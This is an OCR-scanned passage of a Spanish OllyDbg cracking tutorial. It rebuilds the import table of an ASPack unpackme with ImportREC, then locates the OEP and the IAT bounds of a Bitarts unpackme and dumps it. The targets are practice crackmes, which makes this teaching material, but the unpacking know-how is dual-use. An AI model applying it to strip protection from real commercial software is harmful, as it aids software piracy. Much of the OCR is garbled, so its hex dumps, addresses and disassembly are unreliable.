rva:00001200 mod:kemel32. dll ord:0203 name:Heapálloc 
rea:D00001204 mod:kemel32. dll ord:0204 name He pComo 
rea:00001208 mod:kemel32. dll ord:0205 name:HeapCreate 
rya:D000120€ mod:kemel32. dll ord:0207 name:HeapDestroy 


rva:00001210 mod:kemel32. dll ord:0209 name:HeapFree AA 


rea:00001214 mod:kemel32. dll ord:0344 name: Istrcat 


La reemplazo por las similares correspondientes a kernel32.dll y nos dijo algo de esto? 


rea:00001200 forwarded from mod:ntdll. dll ord:01F2 name:RtlállocateHeap 
rva:D0001210 forwarded from mod:ntdll. dll ord:0207 name:RtlFreeHeap 


Current imports: Xx 
2 (decimal: 2] valid module(s) (added: +2 (decimal: +2)) 
D [decimal:29] imported function(s]. (added: +1D (decimal: +29 


Vemos que si que nos aviso en el log que esas entradas son similares a las de kernel32.d1l y seguro 
cambiadas por el packer para molestar y complicar las cosas. 


Bueno entonces solo tenemos que quitar la basura de en medio ya que verificamos que esas entradas 
que dicen NO, son basura, para verificarlo aquí vayamos a una de ellas. 


user32. dll FThunk:0000119C NbFune:? (decimal: 7] valid: YES 
2 FThunk:000011BC NbFunc:B [decimal:11] valid:NO 


D-+) 


ra:D000118C ptr:000010C2 
rya:000011C0 ptr:000010D0 
rya:000011C4 ptr: 0000106 
rva:000011C8 ptr: 00001 0F4, 
rva:000011CC ptr:00001108 
rva:000011D0 ptr:00001116 
¡ rva:000011D4 ptr:00001122 


Marco la primera y hago click derecho- DISASSEMBLE-HEX VIEW 


[=) 


Imported Functions Foun 


+ user32.dll FThunk:0000119C NbFunc:? (decimal: 7] va 
2 FThunk:000011BC NbFunc:B [decimal:11] valid: NO 


rva:D0000118C otr: 00001 0C 


rva:000011( 
rva:000011( 
rva:000011( 
ra Ann 1 


Trace Levell (Disasm) 


ImportREC E 


Read error! 


Alli vemos que no cae en ningun lugar que exista, asi que marcamos todas las entradas basura. 


Import REConstructor v1.6 FINAL (C) 2001-2003 MackT/uCF 


áttach to an Active Process 


c:4documents and settingshricardo.escritorio4escritorio401-crackmetunpackme_aspack2." w 


Pick DLL 


rva:0000118C ptr:000010C2 
rva:D000011C0 ptr:000010D0 
rva:D000011C4 ptr:000010E6 
rva:000011C8 ptr:000010F4, 


rva:000011CC ptr.00001108 
rva:000011D0 ptr:00001116 
rva:000011D4 ptr:00001122 


Apretando SHOW INVALID y alli 


CUT THUNKS. 


Imported Functions Found 
user32. dll FThunk:0000119C NbFunc:? (decimal: 7] valid: YES 
? FThunk:000011BC NbFunc:B [decimal:11] valid.NO 


ENE 
Show Suspect] 


Clear Imports | 


Es 


las tenemos a todas marcadas ahora hacemos click derecho 


E 


user32. dll FThunk:0000119C NbFunc:? ( 


2 FThunk:000011BC NbFunc:B (decimal: 


rva:D0000118C ptr:000010C2 


rva:000011C0 ptr:000010D0 
rva:000011C4 ptr:D000010E6 


Invalidate functionís) 
Disassemble | HexView 


Trace Levell (Disasm) 
Trace Level2 (Hook) 
Trace Level3 (Trap Flag) 


Plugin Tracers » 
Adwanced Commands » 


Expand all nodes 


c:1documents and settingsvicardoh escritorio. escritorio401 -crackmetu 


Imported Functions Found — 


ON user32.dll FThunk:0000119C NbFunc:? (decimal: 7] valid:YES 
+)- kemel32.dll FThunk:000011EC NbFunc:B (decimal:11] valid: YES 


Con lo cual las anulamos a todas esas entradas para que al arrancar el sistema no de error tratando 
de arrancar apis inexistentes. 


Ahora si, apreto FIX DUMP ya que tengo todas las entradas marcadas como YES o sea validas. 


Fixing a dumped file... 4 
2 (decimal: 2] module(s] 

12 (decimal:18)] imported function(s]. 

** Ney section added successfully. RWA:00015000 S12E:00001000 
Image Import Descriptor size: 28; Total length: 17C 2 


CADocuments and SettinasiRicardowE scritoiotESCRITORIOA01 -Crackmetdumpas 


N 


y me crea el dumpaspack_.exe el archivo que supuestamente ya estaria reparado, veamos 
ejecutemoslo. 


Coded by Teddy Rogers / SnD Team 2005 E 


A ASPack 2,12 UnPackMe 


If you umpack it write a tutorial... :) 


Y si funciona perfectamente por lo cual terminamos con el segundo packer para ir aumentando la 
dificultad progresivamente y muy levemente. 


Hasta la parte 36 con otro packer 
Ricardo Narvaja. 


INTRODUCCION AL CRACKING EN OLLYDBG PARTE 36 


Seguimos aumentando muy suavemente la dificultad en los packers que vamos viendo, en 
esta entrega veremos dos desempacados, el crunch o bitarts 5.0 y el telock 0.98, que nos servira 
para introducirlos en el tema de las entradas de la IAT redireccionadas, ambos unpackmes estan 
adjuntos a este tutorial, por lo que no hay problemas para obtenerlos. 


Empezaremos con el mas sencillo con el BITARTS lo arrancamos en OLLYDBG. 


[c] File View Debug Plugins Options Window Help 


[PEE] en] vis] ed] 1] + Ljejmit]iwjH[c]/]x/B]R]...] s 


EN bitarts_.B046B517 


DS: [ESIJ,AL 
DS: [EAXJ], AL 
DS: [EAXJ], AL 
DS: [EAX], AL 
DS: [EAXJ], AL 


(2 DS: [EAXJ], AL 
[Ls] DS: [EAXJ, CH 
DS: [EAX], AL 
ES 55: [EBP-18], DL 
[3] DS: [EAXJ], AL 
DS: [EAXI, AL 
10000001 
5 mou 
PUSH EBP 


Vemos que no hay un PUSHAD inicial, asi que traceemos un poco con f7. 


ax] Pt] => ED a MTM] 7E]B]R]+) + 


pus6BB1 


55 
ES 0000900 CALL 66468010 bitarts_.B046801D 
5D POP EBP 
S1ED 10000001 SUB EBP,1D 
8BC5 MOU EAX,EBP 

PUSH _EBP 


PUSHAD 
9c PUSHFD 
2B35 FCoO7bB001 SUB EAX, DWORD PTR SS: [EBP+7FCI 
9985 ESO70001 MOU DWORD _PTR, SS: CEBP+7E8],EAX 


PAAMA Mn Mint MARA ATA 


Vemos que ahi llega a un PUSHAD asi que pasemoslo con f7 y hagamos ESP- FOLLOW IN 
DUMP. 


<PECX BB12FFED 
O JEDX 7C91EB94 ntdll.KiFastSystem 
EBX 7FFOFOMO 
Bu12FF9C 
EBP 6046680684 — Increment 


ESI FFFFFFFF 
EDI 7C920738 — Decrement 


EIP 00468028 Zero 


ES 895 setto1 
bs ee2a  Modify 


B 
P 1 
AD 
rs] 
5 n FS B893B_ Copy selection to cli 
DO 
DB 


GS 0000 

Laster] <oPY all registers tc 
EFL 00N0B206 
sre enpey UI 
ST1 empty G. Follow in Stack 
ST2 empty B. 


Y pongo un Hardware Breakpoint on access en los primeros bytes. 


Memory, on access 
Memory, on write 


Search for 

Follow DWORD in Disassembler 
Follow DWORD in Dump 

Go to » 


Hardware, on write 
Hardware, on execution 


vw Hex » 


Ahora apreto f9 y despues que pasa alguna que otra excepcion, para por el Hardware Breakpoint. 


CEN ea] vil] sol] el E PLIEEES 


FOS B6041 POP. DWORD PTR FS: [6] 


Traceo unas lineas y llego al OEP. 


[c] File View Debug Plugins Options Window Help 


CEEB Era > $0] + 1jejmt[wju[c),Jx]]r/-/s| ¿35 


Real entry point of SFX code 


PUSH _EBP 
MOU EBP,ESP 
PUSH -1 
PUSH 450E60 
PUSH 429208 SE handler installation 
31 MOV EAX, DWORD PTR FS: [6] 
PUSH EAX 
34 MOU DWORD _PTR FS:[M1,ESP 
ADD ESP,-58 


PUSH EBX 
PUSH ESI 


PUSH EDI 
MOU DWORD_PTR SS: [EBP-18],ESP 


kerne 132, GetVersion 


) 
) 
3 
J 


A 


Al OFP se puede llegar tanto usando el buscador de OEPs de OLLYDBG, el OLLYDBG parcheado 
para OEPs o casi cualquiera de los metodos que vimos en las partes anteriores de la introduccion. 


Como vemos dicha direccion esta en la primera seccion despues del header 


BB3E0000 | 00BB4BDO Priv! Ru Ru 
BO3F0000| BOBB2000 Map |R R 

90490099 00001000 bitarts_ PE header Imag|R RWE 

a bitarts_|.tent code Imag R RUE 

bitarts_|.rdata Imag|R RUE 

bitarts_| data data Imag|R RWE 

bitarts_|.idata Imag | R RWE 

B3000|bitarts_|.rsro resources Imag|R RWE 

00468000 00643000 bitarts_| .edata SFX, imports| Imag|R RUE 

50400000 | BOBB9BDA Map ¡[RE RE 


Por lo cual la cosa parece bien ordenada, incluso esta marcada como seccion CODE asi que no 
habra problemas 


[€] File View Debug Plugins Options Window Help 


PER EJi ElEl ESrEl sil 1jejmit]iwjH[c]/]k[B]R]»..[ 5] _ 


Real entry point of SFX cc 


SPEC Hou EBP, ESP 
6n FF PUSH -1 

63 6B0E4500 |PUSH 450E60 
68 Ca924200 |PUSH_ 4292083 SE handler installation 
64:A1 000000! MOV EAX, DWORD PTR FS: [0] 
50 PUSH_EAX 

64:8925 BOBO MOV DWORD_PTR FS:[07,ESP 
38304 AS ADD ESP, -58 


PUSH EBX 
56 PUSH ESI 


PUSH EDI 

MOV DWORD _PTR SS: CEBP-18],ESP 
4271DC XOR EDX, EDX 
71DE MOU DL, AH 


. 8AD4 
0O4271E0| . BEE 34E64501 MOU DWORD PTR DS: [45E634],EDXx 
ARÍITIFAL . MU FAX. FAX 


kerne132.GetVersion 


38965 ES 
09427106 . CE DCong6al 
10 . 


Vemos que en este caso la primera API que llama es GetVersion por lo cual tambien poner un BP 
en dicha api y cuando para en ella, llamada desde primera seccion, al retornar de la misma, nos 
hubiera dejado, en la zona del OEP. 


Bueno el OEP no tiene misterios, miremos un poco la TAT, por supuesto alli a la vista tenemos una 
llamada directa a una api, por lo cual es facil ver que el CALL INDIRECTO, toma el valor correcto 
en mi maquina de la api GetVersion, para dirigirse a la misma. 


Por lo tanto 460ADC es una entrada de la IAT, la correspondiente a GetVersion, vayamos en el 
dump a verificar la IAT. 


rus Eu 


MONDO I3400Al 
RE 
e] 


OM O AO O OO 
AO <Sr 


A A 1 


"Oe rd hd 
-m. 
OOOO CO MEA, 


o 4 


29 B5 86 7C CF Có6 80 7C 600 00 Ba 66 CO 43 BF 77 1AGI0SCI.... cHéw 
3B 4C OF 77 94 AS 11 77 59 4B BF 77 82 4E OF 77] ;LeworndwYK*weN*w 
C198 D4 11 77 9B 50 BF 77 4F 50 BF 77 10 50 OF 77 | GElWsPXWOPXHWPPXw 
C|3F 59 BF 77 D9 66 BF 77 50 48 BF 77 55 4C OF 77) ?7Pew fawPHRWLUL 
C|C2 4B BF 77 95 D2 11 77 80 5D 15 77 00 00 00 BO/|—KewoElWCIEW.... 
|FE 69 AS 7C ED 69 AS 7C 80 BE AS 7C Ba 49 04 aa midiviciCAÑ aos 
C|EA D6 Di 77 93 B6 DS 77 7D B5 DS 77 27 BE Di 77 /010w04'w34'w" HDw 
238 SE Di 77 DC 16 D2 77 3E Fi D2 77 59 A2 DS 77] (AD bEW>tEwVó 'w 
C6 BS Di 77 ES OF D2 77 7E SE DS 77 AB SE Di 77| SA0WbxEw”"'we4Dw 
ED ES Di 77 41 BD Di 77 42 10 D2 77 95 FB D2 77| yO 0WASIWBPEwO* Ew 
76 BD Di 77 2B 8D Di 77 11 12 D2 77 90 BF D2 77 veIwt+iOwétEwExEw 
9D 0B D2 77 04 BA DS 77 29D 57 DS 77 DA C6 D3 77| Osewél! 'wOW'wr3Ew 
9D Al DS 77 1D B6 Di 77 09 B6 Di 77 21 90 D1 77 01 'wtA4dw. A0wtEbDw 
F9 FF D4 77 DA SE D2 77 14 94 D2 77 OB EF D4 77 - Eur ewllóews” Ew 
B2 F? D4 77 A4 DS Di 77 EC DB Di 77 43 FS D2 77 B-EvñT0WwyB0WC3Ew 
4A C9 D3 77 53 D2 D2 77 59 62 D2 77 58 D6 Di 77 | JrEWSEEWPDEWXI bw 
BO 9B D3 77 BF C2 D3 77 92 BA D2 77 2F BB Di 77| .sEmTEWE. Ew/71 Dw 
FO BE Di 77 68 DA Di 77 A2 65 D2 77 AS C4 Di 77] -L£0w* riwót+EwB-Dw 
29 D9 Di 77 67 D9 Di 77 DB DS Di 77 11 FF D2 77/0041 0wé4 En 
56 98 Di 77 CA F2 D2 77 A2 BD Di 77 GE 97 Di 77| VED=Ew6< Dwéi Dw 
[DA 94 Di 77 35 EE D3 77 D? EB D3 77 9C FA D2 77| róbw5"EwILEW£: Ew 
[DE 10 D2 77 CS EE D4 77 D6 4E D6 77 16 48 D2 77| IHEWS"EWINIW.HEW 
¿[30 21 D3 77 05 C5 Di 77 EE D4 Di 77 EA DA Di 77|<tew44+0w”EDwU rdw 
IC|SE M2 D2 77 E9 11 D3 77 03 EB Di 77 DS FF D2 77| "BEwutEwéUDwWI Ew 
|F3 6D D2 77 4B 15 D3 77 4B BE Di 77 95 47 D2 77 %.EWKSEWKDwOGEw 
2C/1A 60 D3 77 EA ES Di 77 6C 00 D3 77 68 C4 Di 77|+.Ev0b0wl.EWNB-Dw 
0194 BF Di 77 7D EC Di 77 18 CO Di 77 28 SE Di 77/61 0wP Owt -Ow( 40w 
40179 F6 D2 77 6D D6 Di 77 5D 94 Di 77 C3 91 D2 77 y+Ew. 10w16 0 e2Ew 
CJE2 16 D2 77 4F 62 D3 77 15 ES D3 77 3D 62 D3 77/0.Ew08EWS%EW=8Ew 
[AE 98 D2 77 88 C1 Di 77 SE 1A D3 77 2F EA Di 77| <EEWe-Iwá+Ew“ÚUDw 
12 6B D2 77 12 0B D2 77 44 DO D3 77 SF F? D2 77] $39EW$IEWD3EW_-Ew 
73 F9 D2 77 DC F6 D2 77 37 F4 D2 77 28 F? D2 77 |s-EMatEwrIEWÍ -Ew 
30/42 8C Di 77 2E 8C Di 77 8B 14 D3 77 FE EC D3 77/B10w. 10w¡TEweyEw 
(83 F? D4 77 DE F2 D2 77 DF 1A D3 77 F6 FO D4 77| 3-EwI=EW"+Ew=+-Ew 
C|9C F3 D4 77 33 F2 D2 77 6€C C9 Di 77 F6 8B Di 77| £iEw3-=Ewl¡rD0w=-iDw 
00CC|BS 96 Di 77 BC 94 Di 77 61 C6 D3 77 81 ES D2 77/Oú0w. ¿IwaSEviidEew 
C|86 63 D3 77 55 E6 Di 77 AD AS Di 77 ERA M4 DS 77 CAEWUpOwi¿ wie 'w 
C124 13 D2 77 58 BF Di 77 33 B9 Di 77 65 F6 D4 77 | FllEwx- 03] Owe=Ew 
C|2F B? Di 77 B4 F6 D4 77 6€C BF Di 77 FS ES Di 77| 40m -=+Ew l-7 Iw340w 
0/24 15 D3 77 E2 C2 Di 77 29 69 DS 77 DF BA DS 77| 53Ew0-7Dw) i'4el] 'w 
¿[80 14 D2 77 4C 1F D3 77 F9 D? Di 77 F? D6 Di 77| 1MEWLFEw-10w-10w 
> E-IWEADWES Hs: AD 


Command al 


Lo que si se ve bien larga jeje, verifiquemos a ver donde van las entradas. 


Gi5uGicuo 

al5 5] A 
77 94 AS 48 Bl ¿LR REN 
Y7 9B 50 JE We PROP PP 
77 D9 66 PP E PH LIL 
22 98 D2 90) TkMWR ULISES: «+ 


La primera entrada que nos llevo a la IAT era de GetVersion que pertenece a Kernel32.dll, podemos 
mirar en el mapa de memoria donde cae dicha direccion 7CXXxXXxX. 


((FHEOOO] VUDUZODO] SHLWHF 1 «PSI TESOUICES 1mag 


rn 
77FE0000/| 00006000 | SHLWAPI | .reloc |relocations| Imag|R RWE 
70300000 | 00901000 | kerne 132 PE header Imag|R RWE 
7C301000 60032000 kernel32 .tent code, import: Imag R RWE 
7.3830 BBSOBO|kernel32 ¿data data Imag|R RUE 
rC83800 B73000| kernel32| .rsrc resources |ImagíR RUE 
14 =151515) 6000|kernel32| .reloc |relocations| Imag|R RUE 
P0O1ARAAR! ARAR1ARA atril PF header Tmaa!lR RIF 


Vemos que todas corresponden a la Kernel32.dll, por ahi en el medio hay como en la parte anterior 


mezcladas un par correspondientes a la ntdll, pero ya verificamos que el sistema hace una excepcion 
para esas apis, que originalmente eran de kernel32.dll y como fueron reemplazadas por apis 
similares de ntdll.dll, pues por compatibilidad, las acepta como si fueran de la kernel32.dll sin hacer 
problemas, en cualquier otro caso que el sistema no tenga este tipo de excepciones que son muy 
pocas realmente (creo que las unicas), las apis deben ir ordenadas por dll, y separadas por ceros con 
los de otra dll, en una IAT correcta. 


Bueno despues de la separacion vienen hacia abajo un grupo de apis de direcciones del tipo 
TIXKXXXX. 


Si uno tiene alguna duda de alguna entrada a que dll pertenece, ademas de ir al mapa de memoria y 
fijarse, puede marcarla en la IAT y hacer click derecho-FIND REFERENCES. 


View executable file | > 


Copy to executable file 


ECX,BFF 

DWORD PTR DS: [456630], ECX 
ECx,8 

ECX, EDX 

DWORD _PTR DS: [45E62C7,ECX 
EAX, 10 


Goto 
vw Hex 
Text 
a 7C 61 B0 85 70 1962 82 72 Short 
0 70 19 30 87 7C CB D8 81 7C 
5 7C E9 06 87 7C 4E 9988 7C Long 
7C 42 24 80 7C F3 BS 81 7C 
7C BA 238 87 7C BC 6E 82 7C  Float 
70 83 31 87 7C CC 37 87 7C 
70 66 AA 88 7C A9 20 81 7 Disassemble 
7C 19 98 83 7C 59 235 81 7C ¡ 
7C DY EF 88 7C 2D FF 88 7 Special 
7C 11 63 81 7C Bi C7? 80 7C 
7C 21 2E 82 7C BD 99 80 7C 
7C 94 97 88 7C 7B 97 86 7C  Mppearance 
70 00 60 00 00 CA 48 BF 77 
77 59 4B BF 77 82 4E OF 77] ¿Lion dwYKeweNsw 
77 4F 50 BF 77 10 50 OF 77 | GEdwePRWOP Pr 
A e A E e A A TA TT TS 


Con lo cual buscara en el listado, todas las instrucciones que utilizan dicha entrada, en este 
caso.(esto funcionara siempre y cuando el listado este mostrando la seccion del programa donde 
trabaja el mismo, en este caso la primera seccion, si busco referencias, y el listado lo tengo 
mostrando otra seccion diferente, buscara en ella, y probablemente no hallara nada, asi que debo 
verificar antes de usar este metodo, estar en la seccion correcta donde el programa corre ya 
desempacado, o la zona del oep, que es lo mismo) 


y A a A] O A a A] —y Y A A Y A A Y O 


Address |Disassembly Comment 

66405435| CALL DWORD PTR DS: [460BA8] oleaut32.VariantClear 
B041CC2D/ CALL DWORD PTR DS: [460BA8] oleaut32.VariantClear 
B041F68C| CALL DWORD PTR DS: [460BA8] oleaut32.VariantClear 
60421197| CALL DWORD PTR DS: [460BA8] oleaut32.VariantClear 
B042133C| CALL DWORD PTR DS: [460BA8] oleaut32.VariantClear 
BB4213ES| CALL DWORD PTR DS: [460BA81 oleaut32.VariantClear 
B042198F| CALL DWORD PTR DS: [460BA81 oleaut32.VariantClear 
60421096/ CALL DWORD PTR DS: [460BA8] oleaut32.VariantClear 
B04477B1|CALL DWORD PTR DS: [460BAS] oleaut32.VariantClear 
604477DS| CALL DWORD PTR DS: [460BA8S] oleaut32.VariantClear 
664473B1|CALL DWORD PTR DS: [460BA8] oleaut32.VariantClear 
60447E7D! CALL DWORD PTR DS: [460BA8] oleaut32.VariantClear 
B0447FBGE| CALL DWORD PTR DS: [460BA8] oleaut32.VariantClear 
B0447F67| CALL DWORD PTR DS: [460BA81 oleaut32.VariantClear 
B0495234/DD bitarts_.00460BAS 


Alli vemos los CALEs que existen en la priumera seccion correspondientes a dicha entrada. La cual 
pertenece a la api VariantClear de la OleAut32.dll. 


ODE] DUES] Y LIN «UaLo uarta 11M 


r 
76B22000| 0006A990 | winrar ¿PSrO resources Imag|R RWE 
76B2C000| 00002090 | winrar .reloc relocations| Imag|R RWE 
770F900009 | 00061000 oleaut32 PE header Imag!|R RWE 
GB0B7FOBO oleaut32 .text code, import: Imag R RWE 
B| B6BBZ2006' oleaut32| .orpo code Imag|R RWE 
660503000 |olesut32| data data Imag|¡R RWE 
66001000 /oleaut32| .rsro resources Imag|¡R RWE 
oleaut32| .reloc relocations| Imag|R RWE 
77340000) 4B90501098| comot 1_1 PE header Imag|R RWE 


Mirando en el mapa de memoria, vemos que por supuesto el grupo siguiente cae en la seccion code 
de la OleAut32.dll, como corresponde. 


Bl0Ww. 10 TEW"yEw 
3EWIZEWN+Ew-=- EW 
LiEW3=Ew LiF0w-=iUw 
0u0w. ¿OwaSEviidEw 
CHEWU wi ¿wie 
lEwx- Ow3| Owe+Ew 
¿ADIH + EW la Bw3¿4Dw 
F3EWÓT DW) i'll tw 
WIEWLFEw- 1 E + 10 
E-MWEADWES Ew:: AE 
=HEW>JIEWAÁSIWOD30w 
la Dw?¿40w iiHwarDw 
aéb0wn S0W0A80W* FDw 
1AIWtUEw. “EWUMEWw 
ATEWHADWI "EW... 
A A de y 
er*erco*rgr-ri Aur 
CE A 
1374374364164 
1 ¡7uEerru=FSUF 6v 
e... «HiLw£rHMw|fBOw 
¿¿Lwr+Lws3PwbdhHw 
VARWVIARWESTwW20Tw 
E£OwolWRwú 348 1Nw 
EllWe o. Molb.... 
¿.PlaySoundA. .wI 
NMmM.dll.*.GetMod 
uleHandleA..“Bln 
terlockedIncreme 
nt. .fG6lnterlocke 
dDecrement. .úBLoO 
calFree. £óLocalL 
ock.úbBLocalAl loc 
. «áBLocalUn lock. 


ej 


DOE 


DO 


Y 


DUDO 


Si seguimos bajando sin especificar cada dll, vemos grupos de entradas contiguas que van a otras 
dll, separacion con ceros, otro grupo, otra separacion y asi, seguimos bajando hasta ver donde acaba 
este esquema para encontrar el final de la ¡at ya que no se ven ceros donde termina. 


SS IAS 


Tazuz EL 
iI7UETP FRA" 
Dr TIA A 
¿¿Lwr+Lws3PwbdHw 
VARWIARWE3TwW20Tw 
E£OwolWRwú 348% ]Nw 
EllWe o. «rl... 
3.PlaySoundA. . WI 
NMM. dll... GetMod 
uleHandleA..“Bln 
terlockedIincreme 
nt. .f6lnterlocke 
dDecrement..úBLo 
calFree. £BLocalL 
ock.úBlLocalAl loc 
. «áBLocalUn lock. 
úBLockResource. . 


Alli vemos la parte final donde se termina este esquema, vemos en celeste un grupo de apis, 
correspondientes a una dll, luego la separacion, luego en rosado otro grupo de apis, la separacion y 
vemos una entrada marcada con una flecha y otra separacion, luego de la cual ya no se mantiene el 
mismo esquema, podemos verificar si esta api de la flecha pertenece a la IAT, pues fijemosnos si va 
a alguna dll con los dos metodos. 


Follow DWORD in Dump 


3 77 ' 
77 Viewexecutable file | 
77 


Copy to executable file 
Go to 


Y Hex 

Text 

Short 

Long 

Float 
Disassemble 
Special 


Appearance 


7 

CC 74 
41 08 00 57 49/3.Playsour 
65 74 4D 6F 64|NMM.dll.m. 


— — — —_—_— A _ — A A A A 


Address |Disassembl Comment 


60435038 | JMP DWORD PTR DS: [466F24] oledl9.0lelIBusyA 


Vemos que es una entrada de la IAT pues nos lleva a una api en este caso OleUiBusyA de la 
oledlg.dll, si verifico mirando el mapa de memoria. 


72FA4000/| 00902000 | winspool| .reloc relocations| Imag|R RWE 
74CC0000 | 00901000|oledla PE header Imag|R RWE 
74CC1000 60011000 oledlg | .text code, import: Imag R RWE 
74C02400/ 60092000|oledla «data da Imag|R RWE 
74c 6 00008009 oledla "Sto re ces Imag|R RWE 
74C 6 00001006' oledlg .reloc re tions| Imag R RWE 
763 6) 00001006| comdl 932 PE header Imag|R RWE 


Vemos que logicamente cae en la seccion CODE de dicha dll, por lo cual es una entrada de la IAT, 
la unica de esta dll, luego de eso, viene la separacion, y luego vienen grupos de numeros sueltos que 
no estan agrupados para ir a direcciones contiguas, ni sus direcciones apuntan a ninguna dll. 


DU UU UN +2 DU Ll 11 2% LD 51) (1 Ll 1 5T ((] e... M9SLWIJTIIW] 
DA 4C 77 DA F6 4C 77 73 33 50 77 10 64 4D 77] ,¿Lur+Lws3Pwl 
BE 52 77 33 BF 52 77 40 A6 54 77 F1 A? 54 77 | EARWS*RWESTwW: 
9C 4F 77 6F 57 52 77 99 33 4E 77 B2 5D 4E 77| E£OwoOlWRwi3Nw8 
A Ca SA 77 60 66 66 66 FS FA CC 74 00 00 00 00 ElZlw.....4-[Ft. 
BB 50 6. 61 79 53 6F 75 6E 64 41 06 66 57 49/2.PlaySoundA, 
40 2E 64 6€C BB FE 0447 65 74 4 64 | NMM.dll.=.Get 
6. 438 61 6E 6C 65 4 66 7E 01 6EluleHandleA. .” 
65 64 4 63 72 6 65| terlockedInci 

Bl 4%5E 74 65 6C 6F 63 6B 65/nt..fBlnterlc 

44 65 63 72 65 6D 65 6E 74 05 60 94 61 4C 6F| dDecrement . «1 
61 6C 46 72 65 65 0M 9C Bl 4C 6F 63 61 56€ 4C| calFree. £BLoc 


£2 £D Nara OL (at APC LOC: L£2 £1t £xr At £—r £ LE £2l sal ññAl sai 


Si marcamos cualquiera de ellos, y hacemos FIND REFERENCES. 


Search for 


View executable file ba 
Copy to executable file 
Go to 


w Hex 
Text 
Short 
Long 
Float 
Disassemble 
Special 


Appearance 


A 
2E 64 6C 6C Bb FE 00 47 65 
48 6l 6£ 64 60 65 41 ea 8 


Sn em cn e 


[R] File View Debug Plugins Options Window Help 


ax] ej] visi $J ul 1] +] 1/e/m/1]w/n] c] 4]1 


Address |Disassemb ly 


No hay resultados, que nos lleven a apis, por lo cual podemos deducir ya que mas abajo no 
encontramos mas entradas que nos lleven a apis, que aquí se termino la IAT por lo tanto el final de 
la misma es 


FINAL: 460F28 


»OMNwWeRRWI*RWE3Tw 
22 TWE£OWOWRwWÓ 3Nw 
BINWELZW. +. .24-]Ft 
....9.PlaySoundA 
+. + WINMM.dll.m.Ge 
tModu leHandleA.. 
“BInterlockedIno 


Cle.plbt......+L. 
44 pb e TA 
GH EAN 
144 ¿4.4 + 
e ..... 

eonfonos =k rutu ru 
MO WE ÚrWwá3r re... 
LEER Ej'w 
Fo UE Ar 
DICWLA we ir 
wS=wá[irtw.2"wRE"w 
1 ti ER we! 
*0'"w_ 90H "w.¿"w 
Ba' wa" wire" wCp” w 
10-443" wér- 34 - 
5 wh* "E" WéBo” 
?8=w1b"whó"w.*'w 
EC" wma wó l-w"1'wy 
=*twm-wo-"wat'w 
82 "w!*"wy62'we'"w 
*b"wI""wuJT"w+iú"w 


ES 


39 
ca 
1E 
El 
5F 
BS 
12 
68 
D6 
6D 
3D 
FB 
49 


Vemos que el esquema se va repitiendo hacia arriba hasta que llegamos aquí, en celeste estan 
marcadas las separaciones, el grupo marcado en amarillo es el que visualmente reconozco como un 
grupo ordenado que va a una dll, luego hay una separacion y una entrada que va a 8000008, como 
no se si no corresponde a alguna entrada suelta de alguna dll, verifico haciendo FIND 
REFERENCES. 


px He view Debug Plugins Options window Help 


ax] ejt] vis] +1] +] + 1/ElmjT[wjn/c]/]k/B]R]»..[ 5] 


Address |Disassemb ly Comment 


No hay resultados que vayan a apis, ni en esa entrada, ni en ninguna superior por lo cual, podemos 
asegurar que la primera entrada es 460818. 


d+, 14 0 
2A 06 BB 72 24 06 BA BC 2B 06 BM AS 2B 06 MA Ene.ree.0+e.¿+e. 
92 28 06 BA 78 28 D6 BA 60 2B D6 BA 4C 2B 06 00 E+e..+e."+0.L+e. 
2E 28 06 00 00 00 Da 0 0s 00 DB sa 00 B0 DB 00 .+*.....D..C.... 
FO 6B DA 77 18 76 DA 77 F4 EA DA 77 E? EB DA 77|ck puevrwdld rubi pu 
83 78 DA 77 00 09 BA 8 DD 15 CS 58 2E BD C3 58 dx rw... !S4X.< PX 
00 00 00 00 D4 6A EF 77 66 95 EF 77 89 6A EF 77 ....EJ Ufo "Wej"w 
FS AD EF 77 ED D9 EF 77 99 88 EF 77 CO ES EF 77 [ió uv Wii rar 
24 7D EF 77 B2 70 EF 77 77 53 F2 77 1E C9 Fl 77 ")'8!'uuS=wAfr=w 
6C BC EF 77 52 D4 EF 77 FA 8D EF 77 Fl DD EF 77|.2RE"w 1"w2!'w 
51 B2 EF 77 26 DS EF 77 2A ES EF 77 SF 39 F2 77| (Ut. *we0"w_9=w 
71 B4 EF 77 2€ AD EF 77 El 61 EF 77 B8 85 EF 77 0'w.¿'uBa"Wga"w 
CC D2 EF 77 43 70 EF 77 FB ER FO 77 12 832 EF 77|Ite'wCp"w0-wt3"w 
01 72 FO 77 A9 34 FA 77 D5 93 EF 77 68 EF EF 77[Br-84-4'5"wh"*'w 
AA D2 EF 77 B2 6F EF 77 3F 38 F2 77 D6 ES EF 77|E"WBo'w?S=wib"w 
68 EO EF 77 00 60 EF 77 90 5B EF 77 6D AC EF 77 h0"w.''WEL"wmáw 
94 60 FB 77 22 8D EF 77 3D C8 F1 77 32D 6D FO 77 51-w”"1"w=tzu=m-w 
6F CO EF 77 85 7B EF 77 26 D9 EF 77 FB SE EF 77 0t "wal 'utd wr 
36 SA EF 77 FC 8A EF 77 0F 62 EF 77 49 SE EF 77/68" e"ueb"wI""w 
97 SD EF 77 14 9A EF 77 68 FA EF 77 7B C9 FO 77 /ul"wei "uk: "wCr-w 
DA 98 F2 77 1A 48 F2 77 55 EA EF 77 C5 61 EF 77| rú=wB=wU0"wta”w 
78 E6 EF 77 FO 81 EF 77 2D 6C EF 77 98 6E EF 77|pprw-uru-Luún'w 


( 


y 


Y 


ID 


por lo tanto ya tenemos el INICIO y FINAL de la IAT, hallamos el largo. 


FINAL-INICIO= 460F28 — 460818 


TIAS] ID DAS IS IS A DA MIMO NM IU 
, 1 DAA 0 


o sea que el largo es 710 

recopilando para el IMP REC (le restamos ya la imagebase 400000 al OEP y INICIO) 
OEP= 271B0 

INICIO o RVA= 60818 

LARGO= 710 


Bueno hacemos el dumpeado con el OLLYDMP. 


[c] File View Debug Af Options Window Help 
1 HideOD 
2 CommandBar » 
3 Puntos Mágicos » 


4 +BP-OLLY » 


20 debugged process 


Find NFP hw Sertinn Han ns 


ADD ESP,-58 

OllyDump - bitarts_evaluation.c.exe E 
Start Address: [400000 Size: [3000 4 
Entry Point: [eso00 > Modify: [27180 Get ElP as oEP | Can 
Base of Code: [1000 Base of Data: ja8o00 


ÍW Fix Raw Size €: Difset of Dump Image 


| Section | Virtual Size_ | Virtual Offset | Fiaw Size | Fiaw.Offset_| Charactaristics | 
text 00D4A000 00001000 00044000 00001000 EDOODO2O 
.rdata — O0DOCODO 00048000 000OCO0O 00048000 CO000D4O 
data  OODO8BE4 00057000 000O8BE4 00057000  CO000O40 
idata 00003000 00060000 00003000 00060000 CO000040 
